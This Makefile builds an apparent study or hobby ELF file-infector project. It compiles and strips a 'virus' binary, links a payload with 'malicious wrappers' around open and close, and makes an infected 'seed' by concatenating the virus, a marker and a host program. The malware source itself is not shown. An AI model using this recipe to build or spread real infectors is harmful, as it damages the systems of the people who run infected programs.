.PHONY: all clean
all: host virus seed open.o close.o tstWrappers

CC := gcc
CFLAGS := -std=gnu99

clean:
	rm -f host virus seed tstWrappers *.o

# infector
virus: virus.S virus.c
	gcc $(CFLAGS) -o virus -Os -nostdlib virus.c virus.S
	strip -R .eh_frame_hdr -R .eh_frame -R .comment virus -R .gnu.build-id
	# We can go a little bit smaller by running this through ld again to
	# strip a few more elements from the ELF header (see with objdump -p).
	# gcc emits two extra EH_FRAME and STACK segments that ld gets rid of.

%.o: %.c
	gcc $(CFLAGS) -c -o $@ $^

# blundering rube
host: tstWrappers.c
	gcc $(CFLAGS) -o host tstWrappers.c

# payload for infected rube, with malicious wrappers
tstWrappers: tstWrappers.c open.o close.o
	gcc $(CFLAGS) -o tstWrappers tstWrappers.c open.o close.o

# full infected rube
seed: host virus
	echo -ne '\xde\xad\xbe\xef' | cat virus - host > seed
	chmod +x seed
